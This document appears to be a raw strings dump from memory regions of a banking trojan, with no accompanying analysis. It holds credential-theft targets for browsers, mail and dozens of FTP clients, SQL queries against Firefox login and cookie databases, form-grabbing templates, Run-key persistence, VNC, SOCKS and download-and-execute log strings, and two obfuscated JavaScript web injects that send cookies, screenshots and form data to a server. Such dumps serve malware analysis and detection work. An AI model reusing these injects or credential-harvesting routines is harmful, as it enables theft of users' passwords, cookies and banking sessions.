DeleteUrlCacheEntry
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
RegEnumKeyExA
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
CryptImportKey
CryptDestroyKey
RegOpenKeyA
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
SHDeleteKeyA
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
FindCloseUrlCache
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
WinExec
KERNEL32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
COMDLG32.dll
<&<,<2<\<
%System%\imapi.exe
iexplore.exe
chrome.exe
\System32\kernel32.dll
\System32\kernelbase.dll
\ThemeApiPort

jqs.exe_1976_rwx_010B0000_00054000:

%Documents and Settings%\All Users\Application Data\IfarZozip\IfarZozip.dat
.text
.rdata
@.data
.reloc
t.FVSh4
_^SSSh
USER32.dll
GDI32.dll
ADVAPI32.dll
SHELL32.dll
SHLWAPI.dll
WININET.dll
WS2_32.dll
More information: hXXp://VVV.ibsensoftware.com/
ole32.dll
OLEAUT32.dll
8CRYPT32.dll
NETAPI32.dll
HttpSendRequestW
HttpSendRequestExW
HttpSendRequestExA
HttpSendRequestA
HttpQueryInfoA
HttpOpenRequestW
HttpOpenRequestA
HttpAddRequestHeadersA
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
kernel32.dll
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l 1b(i){j.R=i;j.z=q;j.W=2;j.Q=l(){p(x K===\'I\'){K=l(){A{k E G("J.H.6.0")}B(e){}A{k E G("J.H.3.0")}B(e){}A{k E G("J.H")}B(e){}A{k E G("Y.H")}B(e){}k u}}k E K()};j.o=l(a,b,c,d){L f=j.Q();L g=q;L h=j;F=(x(d)==\'I\')?u:s;b=\'/\' j.R \'/\' 18.19() \'/\' b;p(F==s){j.z=q;f.1a=l(){A{p(f.T==4){p(f.O!=P||f.y==\'-\'){h.z=u;p(x(d)=="l"){d(u)}}C{p(f.y==\' \'){h.z=s;p(x(d)=="l"){d(s)}}C{h.z=f.y;p(x(d)=="l"){d(f.y)}}}}}B(e){h.z=u;p(x(d)=="l"){d(u)}}}}f.1e(a,b,F);f.1g(c);p(F==s){k s}A{p(f.T==4&&f.O==P){p(f.y==\'-\'){k u}C{p(f.y==\' \'){k s}C{k f.y}}}k u}B(e){k u}};j.1p=l(){k j.z};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'v\',m,b,c)};j.X=l(a,b){m=\'2/\' a;k j.o(\'w\',m,q,b)};j.Z=l(a,b){m=\'3/\' a;k j.o(\'w\',m,q,b)};j.16=l(a){m=\'4/\';k j.o(\'w\',m,q,a)};j.17=l(a,b,c){t=(b==s)?\'S\':\'D\';k j.o(\'w\',\'5/\' t \'/\' a,q,c)};j.1c=l(a,b,c,d){t=(b==s)?\'S\':\'D\';k j.o(\'v\',\'5/\' t \'/\' a,c,d)};j.1d=l(a,b,c,d){t=(b==s)?\'S\':\'D\';p(x(c)==\'I\'||c==u){c=q;N=\'w\'}C{c=\'1f: \' c;N=\'v\'}k j.o(N,\'6/\' t \'/\' a,c,d)};j.M=l(a,b,c,d){t=(b==s)?\'S\':\'D\';k j.o(\'v\',\'7/\' t \'/\' a,c,d)};j.1h=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1i(a);k j.o(\'w\',m,q,d)};j.1j=l(a,b){m=\'9/\';k j.o(\'v\',m,a,b)};j.1k=l(a){m=\'10/\';k j.o(\'w\',m,q,a)};j.1l=l(a,b){m=\'11/\';k j.o(\'v\',m,a,b)};j.1m=l(a,b){m=\'12/\';k j.o(\'v\',m,a,b)};j.1n=l(a,b,c){m=\'13/\';M=a "\\r\\n" b;k j.o(\'v\',m,M,c)};j.1o=l(a,b){m=\'14/\' a;U=1q.1r.1s;k j.o(\'v\',m,U,b)};j.1t=l(a){m=\'15/\';k j.o(\'w\',m,q,a)}};',62,92,'|||||||||||||||||||this|return|function|Url||Query|if|null||true||false|POST|GET|typeof|responseText|_LastAsync|try|catch|else||new|Async|ActiveXObject|XMLHTTP|undefined|Msxml2|XMLHttpRequest|var|Post|Type|status|200|GetXHR|_Key||readyState|Data|SetVal|Version|GetVal|Microsoft|DelVal|||||||ClearVals|GetServer|Math|random|onreadystatechange|EQFramework|PostServer|Get|open|Cookie|send|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|GetLastAsync|document|location|href|StopVideo'.split('|'),0,{}));
eval('var %s '  
function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=z k(){i.P=p;i.w=p;i.Y=3;i.O=k(){o(y N===\'H\'){N=k(){A{j z G("L.E.6.0")}B(e){}A{j z G("L.E.3.0")}B(e){}A{j z G("L.E")}B(e){}A{j z G("W.E")}B(e){}j s}}j z N()};i.m=k(a,b,c,d){J f=i.O();J g=p;J h=i;F=(y(d)==\'H\')?s:q;b=\'/\' i.P \'/\' 19.1a() \'/\' b;o(F==q){i.w=p;f.1p=k(){A{o(f.T==4){o(f.R!=Q||f.x==\'-\'){h.w=s;o(y(d)=="k"){d(s)}}C{o(f.x==\' \'){h.w=q;o(y(d)=="k"){d(q)}}C{h.w=f.x;o(y(d)=="k"){d(f.x)}}}}}B(e){h.w=s;o(y(d)=="k"){d(s)}}}}f.1b(a,b,F);f.1e(c);o(F==q){j q}A{o(f.T==4&&f.R==Q){o(f.x==\'-\'){j s}C{o(f.x==\' \'){j q}C{j f.x}}}j s}B(e){j s}};i.1g=k(){j i.w};i.1w=k(a,b,c){l=\'1/\' a;j i.m(\'u\',l,b,c)};i.X=k(a,b){l=\'2/\' a;j i.m(\'v\',l,p,b)};i.Z=k(a,b){l=\'3/\' a;j i.m(\'v\',l,p,b)};i.16=k(a){l=\'4/\';j i.m(\'v\',l,p,a)};i.17=k(a,b,c){t=(b==q)?\'S\':\'D\';j i.m(\'v\',\'5/\' t \'/\' a,p,c)};i.1c=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'5/\' t \'/\' a,c,d)};i.1d=k(a,b,c,d){t=(b==q)?\'S\':\'D\';o(y(c)==\'H\'||c==s){c=p;I=\'v\'}C{c=\'1f: \' c;I=\'u\'}j i.m(I,\'6/\' t \'/\' a,c,d)};i.M=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'7/\' t \'/\' a,c,d)};i.1h=k(a,b,c,d){l=\'8/\' b \'/\' c \'/\' 1i(a);j i.m(\'v\',l,p,d)};i.1j=k(a,b){l=\'9/\';j i.m(\'u\',l,a,b)};i.1k=k(a){l=\'10/\';j i.m(\'v\',l,p,a)};i.1l=k(a,b){l=\'11/\';j i.m(\'u\',l,a,b)};i.1m=k(a,b){l=\'12/\';j i.m(\'u\',l,a,b)};i.1n=k(a,b,c){l=\'13/\';M=a "\\r\\n" b;j i.m(\'u\',l,M,c)};i.1o=k(a,b){l=\'14/\' a;U=V.1q.1r;j i.m(\'u\',l,U,b)};i.1s=k(a){l=\'15/\';j i.m(\'v\',l,p,a)};i.1t=k(a){K=V.1u(a);K.1v.18(K)}};',62,95,'||||||||||||||||||this|return|function|Url|Query||if|null|true||false||POST|GET|_LastAsync|responseText|typeof|new|try|catch|else||XMLHTTP|Async|ActiveXObject|undefined|Type|var|El|Msxml2|Post|XMLHttpRequest|GetXHR|Key|200|status||readyState|Data|document|Microsoft|GetVal|Version|DelVal|||||||ClearVals|GetServer|removeChild|Math|random|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|onreadystatechange|location|href|StopVideo|Hide|getElementById|parentNode|SetVal'.split('|'),0,{}));
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
Software\df5a3418-685e-4e1f-a26a-aabf17af39b8
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
KERNEL32.DLL
chrome.dll
127.0.0.1
Content-Type: application/x-www-form-urlencoded
Software\Microsoft\Windows\CurrentVersion\Run
regsvr32.exe "%s"
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsass.exe
lsm.exe
winlogon.exe
taskhost.exe
WININET.DLL
HttpEndRequestA
HttpEndRequestW
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
#cert
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
/work/1.php?sid=%0.8X%0.8X%0.4X%0.4X%0.2X%0.2X%0.4X
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
\\.\pipe\
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
Common Files\Doctor Web
Doctor Web
McAfee.com
DrWeb
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\
Kernel32.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
<HTTPMail_Password2
<IMAP_Password2
<SMTP_Password2
<POP3_Password2
account.cfg
account.cfn
Dir #%u
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Last Server Port
Last Server Pass
Server.Port
Server.User
Server.Host
Server.Pass
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP  .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Password
HTTPMail Password
NNTP Password
IMAP Password
POP3 Password
SMTP Password2
HTTPMail Password2
NNTP Password2
IMAP Password2
POP3 Password2
IMAP Port
SMTP Port
POP3 Port
SMTP User
HTTPMail Server
HTTPMail User Name
HTTP Server URL
HTTP User
SMTP User Name
SMTP Server
SMTP Email Address
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
Chrome_WidgetWin_1
SysShadow
Chrome_WidgetWin_0
Dxtrans.dll
d3d11.dll
d3d9.dll
OPENGL32.dll
d2d1.dll
d3d10core.dll
d3d10.dll
d3d10_1core.dll
d3d10_1.dll
RegCloseKey
RegNotifyChangeKeyValue
ShellExecuteA
DeleteUrlCacheEntry
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
RegEnumKeyExA
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
CryptImportKey
CryptDestroyKey
RegOpenKeyA
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
SHDeleteKeyA
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
FindCloseUrlCache
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
WinExec
KERNEL32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
COMDLG32.dll
<&<,<2<\<
.pdata
@.reloc
CRYPT32.dll
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
iexplore.exe
chrome.exe
\System32\kernel32.dll
\System32\kernelbase.dll
\ThemeApiPort

jqs.exe_1976_rwx_01150000_0007B000:

.text
.rdata
@.data
.reloc
t.FVSh4
_^SSSh
{7BD47FDD-1028-4944-A268-024C76A61BA9}
{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}
{4E153850-602D-4819-B83D-3CCD0A1E7351}
{1DB12055-380D-432E-9763-74AF5EF609C7}
{1DB54A51-7DD5-412D-BFAE-04066B1F7E58}
{6BDA2D4D-43CE-4CEF-B412-5DC94F387B59}
{11166F2F-6DE1-4205-8360-3AB2448931C2}
{7B4F16B2-1959-4C21-97FE-6A7768C974CF}
{433D2A25-41C1-4D21-8ED6-4EEC2CFE2DF1}
{77101F80-23B8-43A9-AE7B-5CC95982109D}
\\.\pipe\{615F04F4-5F33-42AB-BE17-250A447B0979}
D{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}
{56E926DB-5D71-499E-8BBB-2E28568040CB}
U{4E153850-602D-4819-B83D-3CCD0A1E7351}
2FFC7DAE-2BDA-4ABF-A443-1DD264C72327
USER32.dll
GDI32.dll
ADVAPI32.dll
SHELL32.dll
SHLWAPI.dll
WININET.dll
WS2_32.dll
More information: hXXp://VVV.ibsensoftware.com/
ole32.dll
OLEAUT32.dll
8CRYPT32.dll
NETAPI32.dll
HttpSendRequestW
HttpSendRequestExW
HttpSendRequestExA
HttpSendRequestA
HttpQueryInfoA
HttpOpenRequestW
HttpOpenRequestA
HttpAddRequestHeadersA
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
kernel32.dll
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l 1b(i){j.R=i;j.z=q;j.W=2;j.Q=l(){p(x K===\'I\'){K=l(){A{k E G("J.H.6.0")}B(e){}A{k E G("J.H.3.0")}B(e){}A{k E G("J.H")}B(e){}A{k E G("Y.H")}B(e){}k u}}k E K()};j.o=l(a,b,c,d){L f=j.Q();L g=q;L h=j;F=(x(d)==\'I\')?u:s;b=\'/\' j.R \'/\' 18.19() \'/\' b;p(F==s){j.z=q;f.1a=l(){A{p(f.T==4){p(f.O!=P||f.y==\'-\'){h.z=u;p(x(d)=="l"){d(u)}}C{p(f.y==\' \'){h.z=s;p(x(d)=="l"){d(s)}}C{h.z=f.y;p(x(d)=="l"){d(f.y)}}}}}B(e){h.z=u;p(x(d)=="l"){d(u)}}}}f.1e(a,b,F);f.1g(c);p(F==s){k s}A{p(f.T==4&&f.O==P){p(f.y==\'-\'){k u}C{p(f.y==\' \'){k s}C{k f.y}}}k u}B(e){k u}};j.1p=l(){k j.z};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'v\',m,b,c)};j.X=l(a,b){m=\'2/\' a;k j.o(\'w\',m,q,b)};j.Z=l(a,b){m=\'3/\' a;k j.o(\'w\',m,q,b)};j.16=l(a){m=\'4/\';k j.o(\'w\',m,q,a)};j.17=l(a,b,c){t=(b==s)?\'S\':\'D\';k j.o(\'w\',\'5/\' t \'/\' a,q,c)};j.1c=l(a,b,c,d){t=(b==s)?\'S\':\'D\';k j.o(\'v\',\'5/\' t \'/\' a,c,d)};j.1d=l(a,b,c,d){t=(b==s)?\'S\':\'D\';p(x(c)==\'I\'||c==u){c=q;N=\'w\'}C{c=\'1f: \' c;N=\'v\'}k j.o(N,\'6/\' t \'/\' a,c,d)};j.M=l(a,b,c,d){t=(b==s)?\'S\':\'D\';k j.o(\'v\',\'7/\' t \'/\' a,c,d)};j.1h=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1i(a);k j.o(\'w\',m,q,d)};j.1j=l(a,b){m=\'9/\';k j.o(\'v\',m,a,b)};j.1k=l(a){m=\'10/\';k j.o(\'w\',m,q,a)};j.1l=l(a,b){m=\'11/\';k j.o(\'v\',m,a,b)};j.1m=l(a,b){m=\'12/\';k j.o(\'v\',m,a,b)};j.1n=l(a,b,c){m=\'13/\';M=a "\\r\\n" b;k j.o(\'v\',m,M,c)};j.1o=l(a,b){m=\'14/\' a;U=1q.1r.1s;k j.o(\'v\',m,U,b)};j.1t=l(a){m=\'15/\';k j.o(\'w\',m,q,a)}};',62,92,'|||||||||||||||||||this|return|function|Url||Query|if|null||true||false|POST|GET|typeof|responseText|_LastAsync|try|catch|else||new|Async|ActiveXObject|XMLHTTP|undefined|Msxml2|XMLHttpRequest|var|Post|Type|status|200|GetXHR|_Key||readyState|Data|SetVal|Version|GetVal|Microsoft|DelVal|||||||ClearVals|GetServer|Math|random|onreadystatechange|EQFramework|PostServer|Get|open|Cookie|send|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|GetLastAsync|document|location|href|StopVideo'.split('|'),0,{}));
eval('var %s '  
function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=z k(){i.P=p;i.w=p;i.Y=3;i.O=k(){o(y N===\'H\'){N=k(){A{j z G("L.E.6.0")}B(e){}A{j z G("L.E.3.0")}B(e){}A{j z G("L.E")}B(e){}A{j z G("W.E")}B(e){}j s}}j z N()};i.m=k(a,b,c,d){J f=i.O();J g=p;J h=i;F=(y(d)==\'H\')?s:q;b=\'/\' i.P \'/\' 19.1a() \'/\' b;o(F==q){i.w=p;f.1p=k(){A{o(f.T==4){o(f.R!=Q||f.x==\'-\'){h.w=s;o(y(d)=="k"){d(s)}}C{o(f.x==\' \'){h.w=q;o(y(d)=="k"){d(q)}}C{h.w=f.x;o(y(d)=="k"){d(f.x)}}}}}B(e){h.w=s;o(y(d)=="k"){d(s)}}}}f.1b(a,b,F);f.1e(c);o(F==q){j q}A{o(f.T==4&&f.R==Q){o(f.x==\'-\'){j s}C{o(f.x==\' \'){j q}C{j f.x}}}j s}B(e){j s}};i.1g=k(){j i.w};i.1w=k(a,b,c){l=\'1/\' a;j i.m(\'u\',l,b,c)};i.X=k(a,b){l=\'2/\' a;j i.m(\'v\',l,p,b)};i.Z=k(a,b){l=\'3/\' a;j i.m(\'v\',l,p,b)};i.16=k(a){l=\'4/\';j i.m(\'v\',l,p,a)};i.17=k(a,b,c){t=(b==q)?\'S\':\'D\';j i.m(\'v\',\'5/\' t \'/\' a,p,c)};i.1c=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'5/\' t \'/\' a,c,d)};i.1d=k(a,b,c,d){t=(b==q)?\'S\':\'D\';o(y(c)==\'H\'||c==s){c=p;I=\'v\'}C{c=\'1f: \' c;I=\'u\'}j i.m(I,\'6/\' t \'/\' a,c,d)};i.M=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'7/\' t \'/\' a,c,d)};i.1h=k(a,b,c,d){l=\'8/\' b \'/\' c \'/\' 1i(a);j i.m(\'v\',l,p,d)};i.1j=k(a,b){l=\'9/\';j i.m(\'u\',l,a,b)};i.1k=k(a){l=\'10/\';j i.m(\'v\',l,p,a)};i.1l=k(a,b){l=\'11/\';j i.m(\'u\',l,a,b)};i.1m=k(a,b){l=\'12/\';j i.m(\'u\',l,a,b)};i.1n=k(a,b,c){l=\'13/\';M=a "\\r\\n" b;j i.m(\'u\',l,M,c)};i.1o=k(a,b){l=\'14/\' a;U=V.1q.1r;j i.m(\'u\',l,U,b)};i.1s=k(a){l=\'15/\';j i.m(\'v\',l,p,a)};i.1t=k(a){K=V.1u(a);K.1v.18(K)}};',62,95,'||||||||||||||||||this|return|function|Url|Query||if|null|true||false||POST|GET|_LastAsync|responseText|typeof|new|try|catch|else||XMLHTTP|Async|ActiveXObject|undefined|Type|var|El|Msxml2|Post|XMLHttpRequest|GetXHR|Key|200|status||readyState|Data|document|Microsoft|GetVal|Version|DelVal|||||||ClearVals|GetServer|removeChild|Math|random|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|onreadystatechange|location|href|StopVideo|Hide|getElementById|parentNode|SetVal'.split('|'),0,{}));
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
Software\df5a3418-685e-4e1f-a26a-aabf17af39b8
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
KERNEL32.DLL
chrome.dll
127.0.0.1
Content-Type: application/x-www-form-urlencoded
Software\Microsoft\Windows\CurrentVersion\Run
regsvr32.exe "%s"
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsass.exe
lsm.exe
winlogon.exe
taskhost.exe
WININET.DLL
HttpEndRequestA
